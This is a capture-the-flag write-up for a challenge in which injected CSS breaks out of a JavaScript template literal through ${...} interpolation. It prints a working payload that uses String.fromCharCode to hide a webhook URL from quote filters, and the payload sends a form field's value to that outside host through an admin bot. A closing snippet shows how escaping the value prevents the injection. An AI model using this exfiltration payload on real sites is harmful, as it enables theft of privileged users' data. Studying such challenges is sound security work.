i
SRC: https://library.m0unt41n.ch/challenges/i
In this challenge we are very obviously able to inject code into a style tag of the page. Our goal is to obtain an admin session/username so that the server displays the flag. The challenge includes a bot that we can control (we can make it visit the page with the style we inject while it holds an admin session). So the goal is clear: perform a style-based injection to exfiltrate the flag via the bot executing the code within the style tag. Escaping the style tag is not possible because < and > are filtered.
The trick lies in how the style is set: updateStyle(`YOUR_STYLE_CONTENT`). We can't escape the style tag, but our content lands inside a JavaScript template literal, so we can break out of the string within the function argument with a ${...} interpolation. For example: updateStyle(`${alert(1)}body{}`)
We abuse this to execute arbitrary JS, such as our fetch.
I then used the String.fromCharCode trick to build the URL without string literals and bypass potential checks.
CSS:
${fetch(
    /* URL built with String.fromCharCode because quote characters are filtered */
    String.fromCharCode(
      104,116,116,112,115,58,47,47,
      119,101,98,104,111,111,107,46,115,105,116,101,47,
      50,101,51,57,54,53,49,100,45,98,50,97,99,45,
      52,99,49,56,45,57,49,50,51,45,52,52,101,51,
      101,50,57,102,55,53,101,52,47,63
    ).concat(encodeURIComponent(document.forms[0][1].value)) /* flag is the value of the second input of the first form */
  ),
  /* comma operator: the whole interpolation evaluates to a single space, not to the Promise */
  String.fromCharCode(32)
}body{}
The bot is kind enough to fetch our webhook. One tricky part was getting the actual flag itself: just taking the innerHTML/innerText of the document body didn't work, because the flag is inside an input value. Getting the input by id was also difficult, because ", ', ` etc. were filtered, so passing ("flag") wasn't possible. Eventually I figured out to use document.forms[0][1].value, so basically I navigated to the correct input via the forms collection and indexing.
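As an added illustration of the root cause described above (this is not the challenge's code), the following Node/JS snippet models the updateStyle(`...`) sink: user CSS spliced into a template literal gets its ${...} evaluated, whereas serializing the value as a JS string literal keeps it inert. The names renderVulnerable, renderSafe, toJsStringLiteral, runPage and probe are hypothetical.

```javascript
// Added example, not the challenge's own code. Function names are hypothetical.

// Vulnerable pattern: the user-supplied CSS is spliced directly into a JS
// template literal, so any `${...}` in it is evaluated as JavaScript.
function renderVulnerable(userCss) {
  return 'updateStyle(`' + userCss + '`)';
}

// Hardened pattern: serialize the value as a JS string literal. JSON.stringify
// escapes backslashes, quotes and newlines, so `${` is ordinary text. The extra
// replacements keep the literal from closing an inline <script> or being split
// by the JS line terminators U+2028/U+2029.
function toJsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(userCss) {
  return 'updateStyle(' + toJsStringLiteral(userCss) + ')';
}

// Simulates the browser running the rendered script: records what updateStyle
// received and whether any interpolated code executed (probe() is a harmless
// stand-in for the fetch in the real payload).
function runPage(script) {
  const state = { style: null, codeRan: false };
  const updateStyle = (s) => { state.style = s; };
  const probe = () => { state.codeRan = true; return ''; };
  new Function('updateStyle', 'probe', script)(updateStyle, probe);
  return state;
}

// Constructed input with the same shape as the challenge payload:
// an interpolation followed by ordinary CSS.
const PAYLOAD = '${probe()}body{}';

// Vulnerable rendering runs probe() and strips it from the style;
// safe rendering passes the text through untouched.
console.log(runPage(renderVulnerable(PAYLOAD)));
console.log(runPage(renderSafe(PAYLOAD)));
```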